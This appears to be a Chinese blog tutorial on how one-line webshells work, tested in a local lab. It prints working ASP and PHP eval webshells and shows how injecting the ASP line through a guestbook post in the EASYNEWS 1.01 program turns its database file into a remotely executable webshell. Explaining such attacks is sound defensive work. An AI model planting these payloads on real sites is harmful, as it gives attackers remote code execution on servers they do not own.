当前位置:首页 > 大杂烩 > 正文内容

一句话木马原理

高老师9年前 (2017-09-03)大杂烩2982
  1. 搭建模拟环境了解一句话木马的原理.

    (1).创建1.asp文件,代码如下:

        <%eval request("value")%>

       (2).创建2.php文件,代码如下:

         <?php @eval($_REQUEST['value']);?>

        创建了1个asp一句话木马文件,1个php一句话木马文件,上面的代码的意思是获取get/post来的value值,当作脚本代码执行。

        我们访问http://localhost/1.asp?value=Response.Write("gaojiufeng")    将会直接执行value的语句,输出gaojiufeng

        我们访问http://localhost/2.php?value=echo  gaojiufeng;    将会直接执行value的语句,输出gaojiufeng

        也就说一句话木马的语句都会将get/post的代码执行,为什么中国菜刀能获取到网站和服务器的磁盘列表,就是通过对应的asp/php等代码获取到

    2.通过本地的程序了解留言板提交一句话木马为什么可以直接连接

        (1).下载EASYNEWS1.01程序在本地部署

        (2).通过留言板留言,主页中填 <%eval request("value")%>,提交留言

        我们访问http://localhost/ebook/db/ebook.asp?value=Response.Write("13092996963"),将会输出我的手机号码13092996962;

        为什么访问/ebook/db/ebook.asp就能执行语句,我并没有创建一句话木马文件啊?由于ebook.asp是一个数据库accesss数据库文件,修改为asp后服务器认为数据库内容中的<%eval request("value")%>属于asp代码,其他不认识的一律认为是html标签输出。因此导致这个文件可以作为一句话木马连接。

扫描二维码推送至手机访问。

版权声明:本文由高久峰个人博客发布,如需转载请注明出处。

本文链接:https://blog.20230611.cn/post/496.html

分享给朋友:

“一句话木马原理” 的相关文章

Git从远程仓库更新文件

Git从远程仓库更新文件

 git   pull  https://git.oschina.net/392223903/learn.git   master   换为您的git地址...

C# md5加密,C# md5加密代码

C# md5加密,C# md5加密代码

public static string GetMD5(string str) {     //创建MD5对象     MD5 md5 = MD5.C...

IE浏览器无法显示此页解决方案

IE浏览器无法显示此页解决方案

方案1.IE浏览器"无法显示此页"的解决办法(1).按下Win+R键打开运行,输入netsh winsock reset,回车;(2).重启即可. 方案2.IE浏览器"无法显示此页"的解决办法 (1).设置-连接-局域网设置-自动检测设置开...

redis安装教程

redis安装教程

1.文件redis-2.6.14.tar.gz的上传 /home/john/创建rdtar文件夹 上传redis-2.6.14.tar.gz至rdtar文件夹  2.解压文件  cd /home/john/rdtar tar &n...

nginx配置https,nginx ssl配置

nginx配置https,nginx ssl配置

首先在阿里云申请免费的证书,选择自动生成证书。然后就是nginx虚拟主机配置文件的修改。以下是我的配置文件(因为公司开发小程序,没有办法只能使用https)。您只需要关注带有ssl的配置选项,我增加了一个监听80和443的端口,同时增加了http跳转https的配置server  &nbs...

 vsftp 命令,vsftp常用操作命令

vsftp 命令,vsftp常用操作命令

vsftp常用操作命令:1.启动vsftp: service vsftpd start 2.重启vsftp: service vsftpd restart3.修改用户密码:passwd lao8org4.创建用户:useradd -d /data/wwwroot/blog -s /sbin...